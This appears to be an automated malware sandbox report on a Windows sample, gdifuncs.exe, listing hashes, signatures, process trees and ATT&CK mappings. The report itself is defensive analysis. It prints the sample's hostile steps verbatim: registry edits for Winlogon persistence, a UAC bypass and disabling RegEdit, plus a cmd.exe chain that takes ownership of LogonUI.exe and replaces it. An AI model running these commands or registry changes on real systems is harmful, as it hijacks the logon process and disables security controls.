Analysis
- max time kernel: 191s
- max time network: 172s
- platform: windows11-21h2_x64
- resource: win11-20240508-en
- resource tags: arch:x64, arch:x86, image:win11-20240508-en, locale:en-us, os:windows11-21h2-x64, system
- submitted: 25-06-2024 00:14
Static task: static1
Behavioral task: behavioral1
- Sample: gdifuncs.exe
- Resource: win11-20240508-en
Errors
General
- Target: gdifuncs.exe
- Size: 120KB
- MD5: e254e9598ee638c01e5ccc40e604938b
- SHA1: 541fa2a47f3caaae6aa8f5fbfe4d8aef0001905d
- SHA256: 4040ad3437e51139819148ed6378828adcfbd924251af39de8bf100a3a476a63
- SHA512: 92f129a52f2df1f8ed20156e838b79a13baf0cbcdd9c94a5c34f6639c714311f41eb3745fdcc64eac88ce3e6f27d25f9a3250f4ababc630eff7a89802e18b4bb
- SSDEEP: 1536:DKOz5I1MSx56Hj2UItX85ljPQIe9RoSbGF4q2L6OBIyHwPSYxLanv9QD2i:vteMSMHj/rj1SbGFl2L6CIIw5gv9Qy
Malware Config
Signatures
- Modifies WinLogon for persistence (2 TTPs, 1 IoC)
  Processes: gdifuncs.exe
  - Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, wscript.exe \"C:\\windows\\winbase_base_procid_none\\secureloc0x65\\WinRapistI386.vbs\"" (gdifuncs.exe)
- UAC bypass
  Processes: gdifuncs.exe
  - Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" (gdifuncs.exe)
- Disables RegEdit via registry modification (1 IoC)
  Processes: gdifuncs.exe
  - Set value (int) \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" (gdifuncs.exe)
- Disables Task Manager via registry modification
- Possible privilege escalation attempt (4 IoCs)
  Processes (pid, process): 2164 icacls.exe; 2304 takeown.exe; 968 icacls.exe; 4904 takeown.exe
- Modifies file permissions (1 TTP, 4 IoCs)
  Processes (pid, process): 4904 takeown.exe; 2164 icacls.exe; 2304 takeown.exe; 968 icacls.exe
- Drops file in Windows directory (2 IoCs)
  Processes: gdifuncs.exe, cmd.exe
  - File created C:\windows\WinAttr.gci (gdifuncs.exe)
  - File opened for modification \??\c:\windows\WinAttr.gci (cmd.exe)
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Delays execution with timeout.exe (1 IoC)
  Processes (pid, process): 416 timeout.exe
- Kills process with taskkill (1 IoC)
  Processes (pid, process): 2284 taskkill.exe
- Modifies Control Panel (3 IoCs)
  Processes: gdifuncs.exe
  - Set value (str) \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000\Control Panel\Cursors\Arrow = "C:\\Windows\\winbase_base_procid_none\\secureloc0x65\\rcur.cur" (gdifuncs.exe)
  - Set value (str) \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\winbase_base_procid_none\\secureloc0x65\\rcur.cur" (gdifuncs.exe)
  - Set value (str) \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000\Control Panel\Cursors\Hand = "C:\\Windows\\winbase_base_procid_none\\secureloc0x65\\rcur.cur" (gdifuncs.exe)
- Suspicious behavior: EnumeratesProcesses (64 IoCs)
  Processes (pid, process): 2796 gdifuncs.exe (64 occurrences)
- Suspicious use of AdjustPrivilegeToken (5 IoCs)
  Processes: gdifuncs.exe, takeown.exe, takeown.exe, taskkill.exe
  - Token: SeDebugPrivilege, 2796 gdifuncs.exe (2 occurrences)
  - Token: SeTakeOwnershipPrivilege, 4904 takeown.exe
  - Token: SeTakeOwnershipPrivilege, 2304 takeown.exe
  - Token: SeDebugPrivilege, 2284 taskkill.exe
- Suspicious use of WriteProcessMemory (21 IoCs)
  Processes: gdifuncs.exe, cmd.exe (each entry recorded 3 times)
  - PID 2796 gdifuncs.exe wrote to memory of 4904 takeown.exe
  - PID 2796 gdifuncs.exe wrote to memory of 2164 icacls.exe
  - PID 2796 gdifuncs.exe wrote to memory of 412 cmd.exe
  - PID 412 cmd.exe wrote to memory of 2304 takeown.exe
  - PID 412 cmd.exe wrote to memory of 968 icacls.exe
  - PID 412 cmd.exe wrote to memory of 416 timeout.exe
  - PID 412 cmd.exe wrote to memory of 2284 taskkill.exe
- System policy modification (1 TTP, 1 IoC)
  Processes: gdifuncs.exe
  - Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" (gdifuncs.exe)
Processes
- C:\Users\Admin\AppData\Local\Temp\gdifuncs.exe (depth 1)
  Command line: "C:\Users\Admin\AppData\Local\Temp\gdifuncs.exe"
  - Modifies WinLogon for persistence
  - UAC bypass
  - Disables RegEdit via registry modification
  - Drops file in Windows directory
  - Modifies Control Panel
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  - System policy modification
  - C:\windows\SysWOW64\takeown.exe (depth 2)
    Command line: "C:\windows\system32\takeown.exe" /f C:\windows\system32\LogonUI.exe
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
  - C:\windows\SysWOW64\icacls.exe (depth 2)
    Command line: "C:\windows\system32\icacls.exe" C:\\windows\\system32\\LogonUI.exe /granted "Admin":F
    - Possible privilege escalation attempt
    - Modifies file permissions
  - C:\Windows\SysWOW64\cmd.exe (depth 2)
    Command line: "C:\Windows\System32\cmd.exe" /c cd\&cd Windows\system32&takeown /f LogonUI.exe&icacls LogonUI.exe /granted "%username%":F&cd..&cd winbase_base_procid_none&cd secureloc0x65&copy "ui65.exe" "C:\windows\system32\LogonUI.exe" /Y&echo WinLTDRStartwinpos > "c:\windows\WinAttr.gci"&timeout 2&taskkill /f /im "tobi0a0c.exe"&exit
    - Drops file in Windows directory
    - Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\takeown.exe (depth 3)
      Command line: takeown /f LogonUI.exe
      - Possible privilege escalation attempt
      - Modifies file permissions
      - Suspicious use of AdjustPrivilegeToken
    - C:\Windows\SysWOW64\icacls.exe (depth 3)
      Command line: icacls LogonUI.exe /granted "Admin":F
      - Possible privilege escalation attempt
      - Modifies file permissions
    - C:\Windows\SysWOW64\timeout.exe (depth 3)
      Command line: timeout 2
      - Delays execution with timeout.exe
    - C:\Windows\SysWOW64\taskkill.exe (depth 3)
      Command line: taskkill /f /im "tobi0a0c.exe"
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix (ATT&CK v13)
- Privilege Escalation
  - Boot or Logon Autostart Execution (1): Winlogon Helper DLL (1)
  - Abuse Elevation Control Mechanism (1): Bypass User Account Control (1)
Downloads
- memory/2796-0-0x000000007436E000-0x000000007436F000-memory.dmp (4KB)
- memory/2796-1-0x0000000000770000-0x0000000000792000-memory.dmp (136KB)
- memory/2796-2-0x00000000056E0000-0x0000000005C86000-memory.dmp (5.6MB)
- memory/2796-3-0x0000000005230000-0x00000000052C2000-memory.dmp (584KB)
- memory/2796-4-0x0000000074360000-0x0000000074B11000-memory.dmp (7.7MB)
- memory/2796-5-0x0000000005610000-0x000000000561A000-memory.dmp (40KB)
- memory/2796-6 through memory/2796-12, each 0x0000000074360000-0x0000000074B11000-memory.dmp (7 dumps, 7.7MB each)
- memory/2796-13-0x000000007436E000-0x000000007436F000-memory.dmp (4KB)
- memory/2796-14 through memory/2796-22, each 0x0000000074360000-0x0000000074B11000-memory.dmp (9 dumps, 7.7MB each)